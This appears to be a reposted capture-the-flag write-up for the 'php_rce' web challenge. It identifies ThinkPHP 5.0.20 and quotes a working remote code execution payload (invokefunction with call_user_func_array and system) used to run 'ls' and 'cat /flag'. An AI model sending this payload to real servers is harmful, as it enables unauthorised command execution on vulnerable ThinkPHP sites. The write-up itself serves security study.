当前位置:网站首页>Attack and defense world web master advanced area PHP_ rce

Attack and defense world web master advanced area PHP_ rce

2022-07-29 00:17:00 Ant200

Tools

firefox

1. Open the link , Observed that this is a Think PHP V5 frame

2. Try typing index.php, Found that the page did not change , Continue to input the next level file ( Input at will ), Found out the version 5.0.20

3. Query the vulnerability of the relevant version ( Baidu or github) You can try 、

Query to the payload:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

Put it in and try to find something you can use

 ls It's a system command , We just need to change the system command to open flag Just file

structure payload:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

 

4. The query is successful , find flag.

Relevant boss resources :

Attack and defend the world web Advanced master php_rce, Attack and defend the world web Master advanced area 1-5 2020.6.11_ Hazelnut is on the glowing blog -CSDN Blog
php Command execution exploit ,ThinkPHP 5.0 & 5.1 Remote command execution vulnerability analysis _AI Zhongzhi new media a Rong's blog -CSDN Blog
 

 

原网站

版权声明
本文为[Ant200]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/196/202207130558266171.html

边栏推荐

猜你喜欢

随机推荐